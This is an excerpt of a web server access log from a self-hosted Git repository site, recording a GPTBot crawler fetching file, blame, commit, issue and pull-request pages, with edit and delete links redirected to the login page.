"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:40:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:40:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:40:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:40:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:40:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 9819] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 14133] [Gzip 6.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 14134] [Gzip 6.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 9819] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 9820] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13798] [Gzip 6.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:40:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:40:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:40:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:40:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:40:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:19:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 40737] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:19:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:19:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:19:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 22356] [Gzip 11.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:19:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] 